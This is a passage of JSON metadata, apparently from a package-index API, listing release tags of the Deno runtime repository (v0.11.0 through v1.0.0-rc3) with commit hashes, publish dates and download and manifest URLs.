https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2